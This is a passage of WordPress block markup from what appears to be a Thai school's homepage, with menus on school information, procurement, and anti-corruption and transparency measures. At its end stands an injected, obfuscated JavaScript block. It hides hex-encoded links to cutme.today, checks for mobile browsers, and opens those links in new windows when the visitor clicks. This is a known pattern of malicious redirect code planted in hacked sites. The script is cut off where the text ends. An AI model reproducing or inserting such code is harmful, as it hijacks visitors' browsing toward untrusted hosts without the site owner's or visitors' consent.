//nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":180},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"73adeab7\",\"blockVersion\":4,\"display\":\"block\",\"typography\":{\"textAlign\":\"center\",\"fontSize\":\"20px\"},\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"20px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"20px\",\"marginBottom\":\"10px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#0693e3\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<span class=\"gb-button gb-button-73adeab7 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 